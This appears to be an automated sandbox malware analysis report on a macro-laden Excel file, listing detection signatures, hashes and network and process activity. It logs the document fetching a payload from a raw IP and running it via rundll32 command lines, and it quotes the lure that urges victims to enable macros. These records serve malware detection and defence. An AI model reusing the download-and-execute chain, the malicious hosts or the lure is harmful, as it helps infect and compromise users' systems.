Loading ...

Play interactive tourEdit tour

Analysis Report Contract_132508562.xlsm

Overview

General Information

Sample Name:Contract_132508562.xlsm
Analysis ID:382682
MD5:4acf095722b577ef282e9b2b736de65d
SHA1:fbb4e8aee2d48443cd9ee930fc79891edc88edaa
SHA256:8815a2be7dfd8565affb9271d229aab6289a97a96de5428c966fad85c6141e68
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malicious Excel 4.0 Macro
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document contains an embedded VBA macro which may execute processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
IP address seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6880 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 5940 cmdline: rundll32 ..\Hodas.vyur,PluginInit MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1568 cmdline: rundll32 ..\Hodas.vyur1,PluginInit MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7032 cmdline: rundll32 ..\Hodas.vyur2,PluginInit MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
Source: global trafficTCP traffic: 192.168.2.4:49730 -> 185.212.131.194:80
Source: global trafficTCP traffic: 192.168.2.4:49720 -> 83.136.232.110:80
Source: Joe Sandbox ViewIP Address: 83.136.232.110 83.136.232.110
Source: Joe Sandbox ViewIP Address: 190.14.37.247 190.14.37.247
Source: Joe Sandbox ViewIP Address: 185.212.131.194 185.212.131.194
Source: global trafficHTTP traffic detected: GET /44285,5327891204.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.212.131.194Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 83.136.232.110
Source: unknownTCP traffic detected without corresponding DNS query: 83.136.232.110
Source: unknownTCP traffic detected without corresponding DNS query: 83.136.232.110
Source: unknownTCP traffic detected without corresponding DNS query: 185.212.131.194
Source: unknownTCP traffic detected without corresponding DNS query: 185.212.131.194
Source: unknownTCP traffic detected without corresponding DNS query: 185.212.131.194
Source: unknownTCP traffic detected without corresponding DNS query: 185.212.131.194
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.247
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.247
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.247
Source: unknownTCP traffic detected without corresponding DNS query: 185.212.131.194
Source: unknownTCP traffic detected without corresponding DNS query: 185.212.131.194
Source: global trafficHTTP traffic detected: GET /44285,5327891204.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.212.131.194Connection: Keep-Alive
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://api.aadrm.com/
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://api.cortana.ai
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://api.office.net
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://api.onedrive.com
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://augloop.office.com
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://augloop.office.com/v2
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://cdn.entity.
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://clients.config.office.net/
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://config.edge.skype.com
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://cortana.ai
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://cortana.ai/api
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://cr.office.com
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://dev.cortana.ai
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://devnull.onenote.com
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://directory.services.
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://graph.windows.net
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://graph.windows.net/
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://lifecycle.office.com
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://login.windows.local
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://management.azure.com
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://management.azure.com/
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://messaging.office.com/
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://ncus.contentsync.
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://officeapps.live.com
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://onedrive.live.com
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://outlook.office.com/
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://outlook.office365.com/
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://powerlift.acompli.net
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://settings.outlook.com
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://staging.cortana.ai
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://tasks.office.com
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://webshell.suite.office.com
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://wus2.contentsync.
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drString found in binary or memory: https://www.odwebp.svc.ms

System Summary:

barindex
Found malicious Excel 4.0 MacroShow sources
Source: Contract_132508562.xlsmInitial sample: URLDownloadToFileA
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Document image extraction number: 0Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
Source: Document image extraction number: 0Screenshot OCR: Enable Content button from the yellow bar above
Source: Document image extraction number: 1Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
Source: Document image extraction number: 1Screenshot OCR: Enable Content button from the yellow bar above
Document contains an embedded VBA macro which may execute processesShow sources
Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function Auto_Open, API Microsoft Excel:Application.Run(:Range)Name: Auto_Open
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: Contract_132508562.xlsmInitial sample: EXEC
Source: Contract_132508562.xlsmInitial sample: EXEC
Source: Contract_132508562.xlsmInitial sample: EXEC
Source: Contract_132508562.xlsmOLE, VBA macro line: Private Sub Auto_Open()
Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function Auto_OpenName: Auto_Open
Source: Contract_132508562.xlsmOLE indicator, VBA macros: true
Source: classification engineClassification label: mal72.expl.evad.winXLSM@7/9@0/3
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{31EA575D-646A-408A-B7A9-85D4B18154D8} - OProcSessId.datJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\Hodas.vyur,PluginInit
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\Hodas.vyur,PluginInit
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\Hodas.vyur1,PluginInit
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\Hodas.vyur2,PluginInit
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\Hodas.vyur,PluginInitJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\Hodas.vyur1,PluginInitJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\Hodas.vyur2,PluginInitJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Contract_132508562.xlsmInitial sample: OLE zip file path = xl/media/image1.gif
Source: Contract_132508562.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
